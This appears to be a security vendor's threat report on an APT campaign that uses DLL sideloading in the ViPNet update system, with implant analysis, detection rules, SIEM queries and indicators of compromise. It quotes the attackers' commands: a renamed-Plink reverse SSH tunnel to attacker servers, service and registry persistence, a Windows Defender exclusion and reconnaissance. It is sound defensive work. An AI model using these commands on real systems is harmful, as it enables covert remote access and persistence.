UPD 16.07.2026: Added rules to protect companies using our SIEM system Kaspersky SIEM, and listed events for developing custom detection rules or conducting Threat hunting.
UPD 16.07.2026: Added detection of the malicious activity using Kaspersky Managed Detection and Response.
UPD 16.07.2026: Added detection rules and examples using KEDR Expert.
UPD 16.07.2026: Added detection of the malicious campaign in network traffic using Kaspersky Anti Targeted Attack (KATA) with the NDR module.
UPD 16.07.2026: Updated the list of Indicators of Compromise (IoCs) and TTPs.
We discovered a new APT attack using previously unknown tooling, which started at least in May 2026 and remains active at the time of publication. It is notable in that the implants used during it were launched through the ViPNet update system (a software suite for creating secure networks). During our research, we identified attempts of targeted infection of large Russian organizations from the government, energy, transport, education, and logistics sectors, as well as industry. This is not the first time an advanced group has targeted computers connected to ViPNet networks. For example, last year we discovered a complex backdoor mimicking ViPNet updates.
Persistence via the update system
On one of the analyzed systems, we identified a malicious file named wtsapi32.dll in the directory C:\Program Files (x86)\InfoTeCS\VIPNet Update System, which belongs to the ViPNet suite update system. By placing the file in this directory, the attackers implement the DLL Sideloading technique — the ViPNet update system executable file itcsrvup64.exe, which is launched at OS startup, is susceptible to it. Thus, during this attack, the attackers tried to implement persistence on the system through the ViPNet software update component.
HelloInjector — a loader for additional malicious components
The wtsapi32.dll component is a loader, which we named HelloInjector. Its main goal is to inject its code into the svchost.exe process and launch the malicious payload. After launch, the malware checks the process in the context of which it was launched. If the name of the main process is not svchost.exe, the loader starts iterating through all processes running in the operating system. It looks for a process whose name contains the string svchost, and the command line contains the string netsvcs. If such a process is found, the loader injects itself into the target process using the NtWriteVirtualMemory and NtCreateThreadEx functions.
After restarting in the new process, the loader checks the process name again for the presence of the string svchost. Having confirmed the successful check, HelloInjector loads and executes the malicious payload in memory, which is stored in its body in plain text.
The malicious payload, which we named HelloProxy, is simultaneously a hidden proxy and a loader for the following modules sent by the command server. It works by intercepting the NtDeviceIoControlFile, closesocket, and shutdown functions. Their interception is carried out using the Microsoft Detours library.
The handlers of the closesocket and shutdown functions prevent the premature closing of sockets used for interaction with the C2. In turn, the handler of the NtDeviceIoControlFile function contains the main malicious logic. Its code implements the interception of two IOCTL codes:
AFD_RECV(0x12017)AFD_GET_TDI_HANDLES(0x12037)
These codes are used during socket operations — their interception allows the malware to hinder security solutions operating in user mode for filtering network connections. Kaspersky security solutions detect such activity and prevent infection attempts at all stages.
The AFD_GET_TDI_HANDLES handler is responsible for socket registration, and the AFD_RECV handler initiates the processing of incoming traffic. It is worth noting that every incoming message that triggered the processing of the AFD_RECV code is logged to the file C:\users\public\tesh4RPC.txt in the format:
|
threadid: <Thread ID> pid=<PID>\r\n |
After installing the interceptors, the malware starts listening on ports 5003 and 5060 in anticipation of the first commands from the C2 server. In order to distinguish the command server traffic from the rest of the traffic, the implant implements a handshake process: it sends two bytes 0x0502 through the socket and expects to receive a message containing the string ASDFASFSAFASDF. After the successful completion of the handshake, the processing of incoming commands continues.
Depending on the received command, there are two execution branches:
- Working as a proxy. The malware accepts strings in the following format:
Afterwards, it creates new sockets and starts forwarding traffic between them. - Working as a loader. The malware accepts an executable file from the command server, after which it loads it into the memory of its own process and launches it in a separate thread.
During the research, we managed to discover two malicious payloads that were injected into the svchost process, likely as a result of the previously described loader’s operation:
- An implant, which we named HelloExecutor, with the help of which attackers can execute commands on the infected system;
- A module for cleaning ViPNet software log files, which we named HelloCleaner. It allows hiding the attackers’ actions in the system.
We established that the HelloExecutor backdoor was used for reconnaissance in the networks of infected organizations. The following shell commands were executed:
|
query user ipconfig /all ping 8.8.8.8 –n 1 net user /do net group /do dir “C:\Program Files (x86)” dir “C:\Program Files (x86)\infotecs\” dir “C:\Program Files (x86)\infotecs\ViPNet Administrator“ dir “C:\Program Files (x86)\infotecs\ViPNet Client\Export“ dir “C:\Program Files (x86)\infotecs\ViPNet Client“ dir “С:\ProgramData\Infotecs\ViPNet Administrator\kc\Export\“ dir “$appdata\Infotecs\ViPNet Administrator\kc\Export\ Dst for network <номер сети удален>“ dir c:\users\[username] query user dir C:\Users\Public\music |
In these commands, the mention of the directory C:\Users\Public\Music is notable. We established that on infected machines, the attackers used this directory when launching an SSH tunnel from the infected infrastructure to the attackers’ command server (5.39.253[.]206). The attackers launched a renamed executable file of the legitimate PuTTY utility (a client for various remote access protocols):
|
C:\users\public\music\frontpage.exe –C –N –R 8443:[redacted]:5003 sftp@5.39.253[.]206 –P 3522 –pw [redacted] |
HelloBackdoor — a Rust-based backdoor for file system manipulations
In addition to this, a backdoor written in the Rust language, which we named HelloBackdoor, was discovered on one of the infected systems. It accepts connections on port 443, waiting for the string 47c6235b4d2611184 (the second half of the MD5 hash of the string hello\n) to activate the backdoor. This backdoor further accepts the following commands:
!upload — upload a file to the infected machine!down — download a file from the infected machine!stop — stop the backdoor’s operation. For this, a BAT file is created and executed with the following content:
|
@echo off :loop if exist <selfpath> ( del /F /Q <selfpath> if exist <selfpath> goto loop ) sc stop iplircontrol >nul timeout 5 > nul sc start iplircontrol > nul (goto) 2>nul & del /F /Q %0 |
If the command text did not match the above listed, the command is executed using cmd.exe.
Attribution
During the analysis of one of the wtsapi32.dll file samples, we found an unused string:
|
GET / HTTP/1.1\r\nHost: news.sina.com\r\nConnection : keep – alive\r\nUpgrade – Insecure – Requests : 1\r\nUser – Agent : Mozilla / 5.0 (Windows NT 10.0; Win64; x64) AppleWebKit / 537.36 (KHTML, like Gecko) Chrome / 145.0.0.0 Safari / 537.36 Edg / 145.0.0.0\r\nAccept : text / html, application / xhtml + xml, application / xml; q = 0.9, image / avif, image / webp, image / apng, */*;q=0.8,application/signed–exchange;v=b3;q=0.7\r\n |
It refers to the news portal sina.com, which is popular in China.
In addition, analyzing the strings in the HelloBackdoor backdoor, we established that during compilation, Rust packages (crates) were downloaded from the mirror mirrors.ustc.edu.cn. Most likely, these strings remained in the malicious files unintentionally. However, the probability of using “false flags” implanted by attackers to complicate the attribution process cannot be excluded. At present, we link this campaign to the activities of an unknown Chinese-speaking APT group with a low degree of confidence.
Recommendations
Given that ViPNet software is not the first time being used by advanced attackers to conduct cyberattacks, we recommend paying special attention to the protection of workstations with this software. In particular, network traffic monitoring should be configured on the ports specified in the article for timely detection of signs of compromise.
Countering complex targeted attacks requires a comprehensive approach that combines security technologies operating at various stages of the cyberattack lifecycle. Such a multi-level security model helps not only to detect but also to prevent incidents of this class. This approach is embedded in the architecture of the Kaspersky Next Expert line of solutions, designed to protect businesses from APT-level threats, including attacks similar to the one described in this article.
Kaspersky solutions detect this threat using the following verdicts:
- Trojan.Win32.Agentb.ttoe,
- Trojan.Win64.Convagent.gen,
- Trojan.Win64.Agent.smgpqx
- HEUR:Trojan.Win64.DllHijacking.gen
Detection by Kaspersky solutions
Kaspersky security solutions, such as Kaspersky Endpoint Detection and Response Expert, successfully detect malicious activity within the described attacks.
One practical method of detection is monitoring renamed PuTTY/Plink binaries rather than relying on the file name: even if the executable is named frontpage.exe, its PE header, version, strings, and hash match the original Plink, which is confirmed by EDR events. Additionally, it is worth paying attention to the specific command line with which the process was launched. The KEDR Expert solution detects this activity using the using_plink_or_putty_for_port_forwarding rule.
It is also important to monitor Process Injection into svchost.exe originating from the ViPNet update process itcsrvup64.exe, since this component should not legitimately inject code into system processes. Such behavior is a characteristic indicator of HelloInjector activity, which uses a trusted and signed process to mask malicious injection. The KEDR Expert solution detects this activity using the vipnet_load_library_code_injection rule.
Another effective way to detect malicious activity associated with ViPNet is monitoring network traffic. The Kaspersky Anti Targeted Attack (KATA) solution with the NDR module detects this activity using the IDS module and a Suricata rule for the HelloBackdoor backdoor activity.
The rule is implemented based on the first packet expected by the malware. It accepts TCP connections on port 443, expecting to receive the command 47c6235b4d2611184 (part of the MD5 hash of the string “hello\n“), which activates the backdoor.
The Kaspersky Managed Detection and Response service detects this attack using the following indicators:
- Monitoring the creation of the
wtsapi32.dlllibrary in theC:\Program Files (x86)\InfoTeCS\VIPNet Update Systemdirectory. - Monitoring the launch of unusual processes (not typical for ViPNet, lacking an InfoTeCS signature) by the ViPNet update process (
Itcsrvup64.exeorItcsrvup.exe). - Creation of library files (.dll) in a directory associated with ViPNet (by default,
ViPNet Update Systemor VIPNET CLIENT) by ViPNet processes. - Atypical activity (file creation/process execution) from an instance of the
svchost.exeprocess. - Creation of executable files in directories that are writable by default (
%ProgramData%,%TEMP%,%SystemRoot%\Temp, C:\Users\Public, music|pictures|videos|contacts|links|libraries). - Monitoring the creation of tunnels using ssh or plink processes (identification is performed based on the original PE file name, not the executable file name); the detection is based on the presence of substrings like
port:address:portand their variations in the command line.
To protect companies using our Kaspersky SIEM system, the product repository contains rules that help detect such malicious activity.
Reconnaissance of users and groups, as well as network connections using standard Windows utilities, is detected by the following rules:
- R220_02_Collection of user account information using standard Windows tools
- R221_01_Windows group discovery via Windows tools
- R224_02_Remote system discovery via standard Windows tools
- R224_14_Windows reconnaissance activity
- R226_02_Collection of information about network connections using standard Windows tools
Also, for developing your own detection rules or conducting Threat hunting, we recommend paying attention to the following events:
- Creation of suspicious files in the ViPNet update directory
C:\Program Files (x86)\InfoTeCS\VIPNet Update System:
(DeviceEventClassID = ‘4663’ OR DeviceEventClassID = ’11’)
AND match(FileName, ‘.*\\.(exe|dll)’)
AND FileName ilike ‘%\InfoTeCS\VIPNet Update System\%’
- Persistence using the DLL Sideloading technique by loading the
wtsapi32.dlllibrary into ViPNet update processesItcsrvup64.exeorItcsrvup.exewith an invalid signature (Signed not true, SignatureStatus not valid) or a signature that does not contain information about the manufacturer InfoTeCS:
DeviceEventClassID = 7
AND match(DestinationProcessName, ‘.*\\\\(itcsrvup64|itcsrvup)\\.exe’)
AND FileName ilike ‘%wtsapi32.dll’
AND FileName ilike ‘%\InfoTeCS\VIPNet Update System\%’
AND ((DeviceCustomNumber1 = 0 AND DeviceCustomNumber2 = 0) OR NOT FlexString2 ilike ‘%InfoTeCS%’)
- Launching non-standard processes from ViPNet update processes
Itcsrvup64.exeorItcsrvup.exe:
(DeviceEventClassID = ‘4688’ OR DeviceEventClassID = ‘1’)
AND match(SourceProcessName, ‘.*\\\\(Itcsrvup64|Itcsrvup)\\.exe’)
AND NOT match(DestinationProcessName, ‘.*\\\\(wmail|monitor|itcsrvup64)\\.exe’)
- Launching ViPNet update processes
Itcsrvup64.exeorItcsrvup.exewith an invalid signature (Signed not true, SignatureStatus not valid) or a signature that does not contain information about the manufacturer InfoTeCS: - Atypical reconnaissance execution from the
svchost.exeprocess:
(DeviceEventClassID = ‘4688’ OR DeviceEventClassID = ‘1’)
AND SourceProcessName ilike ‘%svchost\.exe’
AND match(DeviceCustomString4, ‘.*cmd(.exe)?.*\/c\s+(net\s+(use|group)|sc\s+(query|start|stop)|ping|ipconfig|netstat).*’)
- Creation of tunnels using renamed ssh or plink processes:
DeviceEventClassID = ‘1’
AND match(OldFileName, ‘.*(plink|ssh).*’)
AND DeviceCustomString4 match ‘\d+:\d+\.\d+\.\d+\.\d+:\d+’
For the correct operation of detection rules and Threat hunting, it is necessary to ensure that events from Windows systems are received by the Kaspersky SIEM system in full, including events with the following identifiers: Sysmon 1, 7, 11, as well as Security 4688, 4663.
Indicators of Compromise
HelloBackdoor
16C211C96735F2FAE9361B89BD7A31BF
1BFE2B9493128574907A8279256A8BCC
f9eed2f0158dc98e7012fb809152209c
HelloBackdoor Droppers:
6001829A128FE264B4403138700C11A8 – infotecs\vipnet client\puh.exe
EE4FF46DDD8489E81447962F927BC3F6 – infotecs\vipnet client\store.exe
Utility for adding exclusions to Windows Defender:
41c938b3cd7e55d4077e34976929b140
wtsapi32.dll
B103CD21280B4061F88B2BCC51394894
9F5606A0755BC633B9BD7DB6D179C09E
0CFDFFC56F0FA325D0C4D24780B46597
Detected TTPs:
T1569.002 — System Services: Service Execution
"cmd" /c sc start UrBackupClientBackend
T1016 — System Network Configuration Discovery
"cmd" /c arp -a"cmd" /c routeprint
T1049 — System Network Connections Discovery
T1018 — Remote System Discovery
"cmd" /c ping mail.ru -n 2
T1082 — System Information Discovery
T1057 — Process Discovery
T1007 — System Service Discovery
"cmd" /c sc query UrBackupClientBackend
T1083 — File and Directory Discovery
"cmd" /c dir temp*.tmp"cmd" /c dir $temp\*.tmp"cmd" /c dir amgmt*"cmd" /c dir $user\desktop\mRemoteNG-Portable-1.76.20.24669"cmd" /c dir $public\libraries\"cmd" /c dir d:\WindowsImageBackup
T1005 — Data from Local System
"cmd" /c type $temp\TS_E9E3.tmp"cmd" /c type $temp\Acr6F3D.tmp
T1074.001 — Local Data Staging
"cmd" /c copy appdata\infotecs\*\APN000B.txt $public\libraries\
T1070.004 — Indicator Removal: File Deletion
"cmd" /c del $windir\amgmt.dll"cmd" /c del $public\libraries\APN000B.txt
T1543.003 — Create or Modify System Process: Windows Service
sc stop AppMgmtsc delete AppMgmtsc create AppMgmt binpath= "system32\svchost.exe -k netsvcs" type= share start= auto displayname= "Application Management"sc description AppMgmt "Processes installation, removal, and enumeration requests for software deployed through Group Policy. If the service is disabled, users will be unable to install, remove, or enumerate software deployed through Group Policy. If this service is disabled, any services that explicitly depend on it will fail to start."sc failure AppMgmt reset= 0 actions= restart/0
T1112 — Modify Registry
reg add HKLM\SYSTEM\CurrentControlSet\Services\AppMgmt\Parameters /v ServiceDll /t REG_EXPAND_SZ /d $system32\$selfname.dllreg add HKLM\SYSTEM\CurrentControlSet\Services\AppMgmt\Parameters /v ServiceMain /t REG_SZ /d ServiceMain
T1036 — Masquerading (service, description, and DLL masquerade as the legitimate Application Management)
"cmd" /c copy $windir\amgmt* $system32\
T1059.003 — Execution of auxiliary scripts
"cmd" /c $windir\amgmt.bat"cmd" /c $windir\insru.cmd
T1105 — Ingress Tool Transfer
"cmd" /c $programfiles\7-zip\7z.exe x $windir\Irsoisas.zip -o"$windir
T1562.001 — Impair Defenses: Disable or Modify Tools
"cmd" /c \$windir\puh.exe add $windir\autoit3.exe white
T1059 / T1218 — Proxy execution via AutoIt
"cmd" /c \$windir\autoit3.exe \$windir\data.dat
T1572 — Protocol Tunneling / T1090 — Proxy / T1021.004 — Remote Services: SSH
c:\users\[username]\libraries\pagent.exe -C -N -R 6443:[redacted] root@176.32.34.135 -P 48022 -pw [redacted]


